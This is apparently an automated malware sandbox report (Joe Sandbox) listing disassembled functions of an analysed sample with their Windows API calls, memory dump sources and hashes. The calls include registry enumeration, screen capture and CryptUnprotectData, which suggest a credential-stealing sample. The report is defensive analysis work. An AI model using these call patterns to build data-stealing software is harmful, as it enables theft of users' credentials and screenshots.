                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2068576380-0
                                                                                                                                                                                                                                                  • Opcode ID: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction ID: ced38eb9f21c4034cf30ee1d49fcfcd9fbc331f8d937d5f2964da7dc653b012b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c45f9d86cd296bcbfa173a7556aa1cf9a65bdabc4f7db8be125951dd596eadab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E00148755083029BD301EF68D885A5AFBE5FF98345F018A5AF88893250E770D994CBA2
                                                                                                                                                                                                                                                  Function 00B142CC Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                                                                                                                  • Opcode ID: 578b1cc228f121bc5d8ed93bd6eaf3ddf4f23214b538792434dae786e0614e64
                                                                                                                                                                                                                                                  • Instruction ID: f2831df557c447c0700fd56e2b32beb610c78eb083a14b6b9ae526e9a82183a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 578b1cc228f121bc5d8ed93bd6eaf3ddf4f23214b538792434dae786e0614e64
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3E092288042509BD311C724FD477C67BA2AB5BB01F042258E740172E0DF785D69C3DF
                                                                                                                                                                                                                                                  Function 004010B0 Relevance: 27.1, APIs: 18, Instructions: 125stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010CB
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010D8
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315C9), ref: 004010FF
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315CC), ref: 00401124
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315CF), ref: 00401149
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315D2), ref: 0040116E
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315D5), ref: 00401199
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315C9), ref: 004011A1
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315D8), ref: 004011C2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315DB,?,004315D8), ref: 004011E7
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315DE,?,004315DB,?,004315D8), ref: 0040120C
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 00401231
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 00401256
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 0040125E
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 0040127F
                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040128C
                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040129F
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004012B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$memsetstrcmp$ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3817037828-0
                                                                                                                                                                                                                                                  • Opcode ID: 728af6f4b6e436d0f42b955efdaf7f2f13925295410a051c2a29943bed5eb9b8
                                                                                                                                                                                                                                                  • Instruction ID: 6a77ad9a97fae506735b514474991cfdc0921c47067fbaefa5242544d6cd76bf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 728af6f4b6e436d0f42b955efdaf7f2f13925295410a051c2a29943bed5eb9b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0341E420A442807AD7219B61FD8CB9A3EA95F96318F44307EF442251F2CBFD0588C36E
                                                                                                                                                                                                                                                  Function 00B10E3E Relevance: 24.5, APIs: 16, Instructions: 480registryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B10E5A
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B10E73
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B10E84
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B10E95
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00643CD2,00000000,00000001,?), ref: 00B10EFE
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,00643D28,00643D10,00000010,00000000,?,00000004), ref: 00B10F7B
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B10F98
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B10FCC
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00643D32,00000000,00000009,?), ref: 00B11033
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 00B1106B
                                                                                                                                                                                                                                                    • Part of subcall function 00B13AC7: lstrlen.KERNEL32(?,?,?,?,?,00B01847,?,0042EEFC), ref: 00B13AE0
                                                                                                                                                                                                                                                    • Part of subcall function 00B13AC7: lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B09
                                                                                                                                                                                                                                                    • Part of subcall function 00B13AC7: lstrcat.KERNEL32(00000000,?), ref: 00B13B11
                                                                                                                                                                                                                                                    • Part of subcall function 00B13A27: lstrcpy.KERNEL32(00000000), ref: 00B13A5F
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,00643D88,0000FFFF,00000000,?,00000004,?,?,?), ref: 00B111E3
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,00643DB0,00000002,00000000,?,?,?,?,00643DA0,?,?,?,?,?), ref: 00B112DA
                                                                                                                                                                                                                                                    • Part of subcall function 00B13A6D: lstrcpy.KERNEL32(00000000,00000000), ref: 00B13AAD
                                                                                                                                                                                                                                                    • Part of subcall function 00B13A6D: lstrcat.KERNEL32(00000000,0042EEFC), ref: 00B13AB7
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,00643DC0,00000002,00000000,?,?,?,?,00643BBD,?,?,?), ref: 00B11375
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC,?,?,00643DD0), ref: 00B113D2
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 00B11490
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00643BC0), ref: 00B1151C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Valuememset$Closelstrcpy$EnumOpenlstrcat$lstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 327098194-0
                                                                                                                                                                                                                                                  • Opcode ID: cdfd7f7ffb602feaeb5d0b1cb599e72a99351b3c00e1df40b6be7f6cd5ac3a16
                                                                                                                                                                                                                                                  • Instruction ID: 97d371c78ba081c4dd93cdfd2a91916ab116d52610fd231679b8027fb1aa1e88
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdfd7f7ffb602feaeb5d0b1cb599e72a99351b3c00e1df40b6be7f6cd5ac3a16
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD12E434E002A49ADB20EF64DC55BEE7BF6EF86704F801499E04667292DBB45A85CB50
                                                                                                                                                                                                                                                  Function 00B0130C Relevance: 21.1, APIs: 14, Instructions: 129stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$memsetstrcmp$ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3817037828-0
                                                                                                                                                                                                                                                  • Opcode ID: abc8560da33bf2fb35fd7676998d50ed9d1deec662aada542982aacc3b18bb14
                                                                                                                                                                                                                                                  • Instruction ID: a9e38017e356f8845ffbe3ecdea880c42f1cc7a5a14b5f81257780f599ff6900
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abc8560da33bf2fb35fd7676998d50ed9d1deec662aada542982aacc3b18bb14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B141F520904280BAD722DB65ED8DB993EE69FD6318F8034B9F043111F1DBAD0549C32E
                                                                                                                                                                                                                                                  Function 00B144EE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 169registrystringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,00000000,00020019,0042EEFC), ref: 00B14532
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 00B14573
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019), ref: 00B145DB
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,?,?), ref: 00B14608
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00B1461F
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,0064403B), ref: 00B146B6
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00644040), ref: 00B1472D
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 00B14759
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 00B1476D
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B14777
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Close$EnumOpenQueryValue$lstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                                  • API String ID: 2954784806-1684325040
                                                                                                                                                                                                                                                  • Opcode ID: af859ca9dc6edd80a9ec9f16aa9c02abffaa3d524dfc5d6bcc5b65d79d611d53
                                                                                                                                                                                                                                                  • Instruction ID: 6fb53b90841c47904d24922cf64ead7450407a31ec4a9b033165022f0b5ddb40
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af859ca9dc6edd80a9ec9f16aa9c02abffaa3d524dfc5d6bcc5b65d79d611d53
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B61CF31218344AFD311AF60DC86FAEBBE5FF86B48F00581DF68583161EB745A88CB52
                                                                                                                                                                                                                                                  Function 00B14EFD Relevance: 18.2, APIs: 12, Instructions: 159COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B14F36
                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00B14F40
                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B14F4D
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00B14F7D
                                                                                                                                                                                                                                                  • GetHGlobalFromStream.COMBASE(?,?), ref: 00B15019
                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(?), ref: 00B15021
                                                                                                                                                                                                                                                  • GlobalSize.KERNEL32(?), ref: 00B15037
                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00B1509D
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00B150B8
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00B150BF
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 00B150CC
                                                                                                                                                                                                                                                  • CloseWindow.USER32(?), ref: 00B150D3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3547074919-0
                                                                                                                                                                                                                                                  • Opcode ID: 786feabe4aac4ce43d01109e92d56cb5fec2791526f4185d5024407780f808c1
                                                                                                                                                                                                                                                  • Instruction ID: 7e0702e6bd5d4a5eb1afc5c4453995820e2e26cc999f3d77d97da5bcc5acdf20
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 786feabe4aac4ce43d01109e92d56cb5fec2791526f4185d5024407780f808c1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F514D75900219EFCF01DFA0DC4AEEEBBB9FF09350B405159F906A3160EB70AA55CBA1
                                                                                                                                                                                                                                                  Function 00B11539 Relevance: 17.0, APIs: 11, Instructions: 496stringmemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00B13975: lstrcpy.KERNEL32(00000000,?), ref: 00B13999
                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00B1165B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,00000028,0042EEFC), ref: 00B11694
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B116EE
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B1174F
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B117B1
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00B11843
                                                                                                                                                                                                                                                    • Part of subcall function 00B153D7: malloc.MSVCRT ref: 00B153E8
                                                                                                                                                                                                                                                    • Part of subcall function 00B13A27: lstrcpy.KERNEL32(00000000), ref: 00B13A5F
                                                                                                                                                                                                                                                    • Part of subcall function 00B0B19F: lstrlen.KERNEL32(?,00000000,?,00000000,?,?,00B0882B,00000000,?,?,?,?,?,?,?), ref: 00B0B1AD
                                                                                                                                                                                                                                                    • Part of subcall function 00B0B19F: LocalAlloc.KERNEL32(00000040,00000000,?,00B0882B,00000000,?,?,?,?,?,?,?), ref: 00B0B1D8
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00643BBD), ref: 00B11A34
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00643BBD), ref: 00B11A92
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00643BBD), ref: 00B11A9A
                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00B11AD4
                                                                                                                                                                                                                                                    • Part of subcall function 00B139DF: lstrlen.KERNEL32(00000000,?,?,00B0883E,0042EEFC,00000000,?,?,?,?,?,?,?), ref: 00B139E8
                                                                                                                                                                                                                                                    • Part of subcall function 00B139DF: lstrcpy.KERNEL32(00000000,00000000), ref: 00B13A19
                                                                                                                                                                                                                                                    • Part of subcall function 00B13AC7: lstrlen.KERNEL32(?,?,?,?,?,00B01847,?,0042EEFC), ref: 00B13AE0
                                                                                                                                                                                                                                                    • Part of subcall function 00B13AC7: lstrcpy.KERNEL32(00000000,00000000), ref: 00B13B09
                                                                                                                                                                                                                                                    • Part of subcall function 00B13AC7: lstrcat.KERNEL32(00000000,?), ref: 00B13B11
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 00B11AF2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b00000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcatlstrcpy$strtok_s$AllocHeapLocalProcessmalloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2997608458-0
                                                                                                                                                                                                                                                  • Opcode ID: a68134cb651d9ddd32a15a0d10eae0307fd36d674900b40827a4ca3a86a29651
                                                                                                                                                                                                                                                  • Instruction ID: d068e82304bc06aaee668f5a971194f34eaebd99fda98425c639514abed6ccdc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a68134cb651d9ddd32a15a0d10eae0307fd36d674900b40827a4ca3a86a29651
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E5121834A006A59ACF01EF74DC82BEE7BF6AF56700F841199F501A7292EFB45B85CB50
                                                                                                                                                                                                                                                  Function 0041F76E Relevance: 16.7, APIs: 11, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F77F
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F7C3
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7DF
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7F9
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F800
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F810
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F835
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F849
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F8D7
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F8F6
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F919
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$HandleInformationSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 998994793-0
                                                                                                                                                                                                                                                  • Opcode ID: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction ID: ddda595af80ec950f864e733dfaf86c15ba5cdc8ff8ff1ee9bb0ea447fc4cfe9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84563d45de5e7e7dfbdedab2ba3d9c28b9990e6308a4cfc2197bd82fb4c0f57d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6515771604305AFD724DF16C884EABBBE8FFC4714F50492EF58997201D734A84ACBA9
                                                                                                                                                                                                                                                  Function 00B18C08 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 263registrystringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00B18C2A
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?), ref: 00B18C47
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?), ref: 00B18C61
                                                                                                                                                                                                                                                    • Part of subcall function 00B139A7: lstrcpy.KERNEL32(00000000), ref: 00B139CA
                                                                                                                                                                                                                                                    • Part of subcall function 00B18952: FindFirstFileA.KERNEL32(?,?), ref: 00B189A7
                                                                                                                                                                                                                                                    • Part of subcall function 00B18952: lstrcat.KERNEL32(?,?), ref: 00B18A6B
                                                                                                                                                                                                                                                    • Part of subcall function 00B18952: lstrcat.KERNEL32(?), ref: 00B18A78
                                                                                                                                                                                                                                                    • Part of subcall function 00B18952: lstrcat.KERNEL32(?,?), ref: 00B18A86
                                                                                                                                                                                                                                                    • Part of subcall function 00B18952: lstrcat.KERNEL32(?,?), ref: 00B18A93
                                                                                                                                                                                                                                                    • Part of subcall function 00B18952: lstrcat.KERNEL32(?,?), ref: 00B18ACD
                                                                                                                                                                                                                                                    • Part of subcall function 00B18952: FindNextFileA.KERNEL32(00000000,?), ref: 00B18BB6
                                                                                                                                                                                                                                                    • Part of subcall function 00B18952: FindClose.KERNEL32(00000000), ref: 00B18BC5
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00B18C6A
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B18C84
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 00B18C91
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3469557335.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
